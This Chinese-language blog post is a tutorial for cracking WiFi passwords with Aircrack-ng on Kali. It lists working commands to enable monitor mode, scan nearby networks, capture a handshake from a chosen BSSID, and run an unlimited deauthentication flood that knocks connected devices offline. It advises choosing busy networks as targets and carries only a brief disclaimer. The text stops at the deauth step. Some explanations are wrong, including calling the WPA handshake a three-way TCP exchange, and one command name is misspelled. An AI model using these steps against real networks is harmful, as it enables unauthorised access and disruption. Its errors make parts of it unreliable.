Kali学习笔记-用Aircrack-ng抓包破解WiFi密码

2021年7月4日 2426点热度 0人点赞 0条评论

Aircrack-ng是一款非常著名的无线渗透软件，很多人就是因为这款软件才了解到kali这个操作系统，进而打开了渗透的新世界大门。下面是笔者学习Aircrack-ng过程的记录（本文仅供学习交流之用，请勿用于非法活动，由此引发的各种后果与本人无关）。

无论你是物理机还是虚拟机安装的kali，软件的操作过程都是一样的，无非是无线网卡的选择有区别。如果你的是物理机安装，那就要确保你物理机的无线网卡支持监听和注入模式。如果你是虚拟机安装或物理机的无线网卡不支持监听和注入模式，就需要额外购置一个支持监听和注入模式的USB无线网卡，可以在拼多多或淘宝购买。下面是具体的操作步骤。

因为2020.1a及以后版本的kali做了一些权限上的修改，默认不再是root权限，所以很多命令需要提权运行，即加上sudo，否则会提示无法找到命令。或者也可以直接sudo -i切换到root用户。

打开终端输入如下命令：

sudo ifconfig -a

查看无线网卡是否已经连接好，如果你只有一块无线网卡，一般会显示wlan0，如果显示出wlan0了就是连接好了。

打开无线网卡的监听模式，监听模式打开后会断网。输入如下命令：

sudo airmon-ng start wlan0

可能会提示某些进程可能会导致问题等等，如下图

这时根据提示输入如下命令杀死可能会导致问题的进程：

sudo airmon-ng check kill

输入如下命令查看无线网卡的监听模式是否成功打开：

sudo iwconfig

出现了wlan0mon就表示打开了，接着我们开始搜索附近的WiFi，输入如下命令：

sudo airodump-ng wlan0mon

当找到自己要破解的WiFi后按Ctrl+C停止。

其中

BSSID：WiFi的MAC地址
PWR：信号强弱程度，绝对值越小信号越强
Data：数据量，越大使用的人就越多，建议选择Data数值高的作为攻击目标，这说明有设备连接到了路由器上，抓到包的概率比较高
CH：信道
ESSID：WiFi的名称，中文可能会有乱码。

然后输入如下命令开始抓取握手包：

airodump-ng --bssid BSSID（即WiFi的mac地址） -c 信道 -w 抓包存储的路径 wlan0mon

这里以我家WiFi为例：

sudo airodump-ng --bssid 8C:AB:8E:C0:B5:F0 -c 6 -w /home/max/wifi wlan0mon

注意，如果没有新的设备连进来是无法抓到握手包的，因此我们需要新建另一个终端攻击已经连到这个WiFi的设备，使其下线并重连。新建终端后，输入如下命令：

sudo airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a BSSID 网卡名（一般为wlan0mon）

-0 0为用deauth洪水攻击WiFi设备的次数，-0 0为无限次，需要手动按Ctrl+C停止，-0 5则攻击5次后自动停止。攻击原理是：先让设备掉线，设备会再自动连接，并发这个自动连接过程会进行三次握手，会发送tcp包（里面包含加密的密码数据），我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码)，一般是无限次，因为可以自己手动Ctrl+C停止

以我的手机为例：

sudo aireplay-ng -0 0 -c A8:7D:12:D5:9E:F2 -a 8C:AB:8E:C0:B5:F0 wlan0mon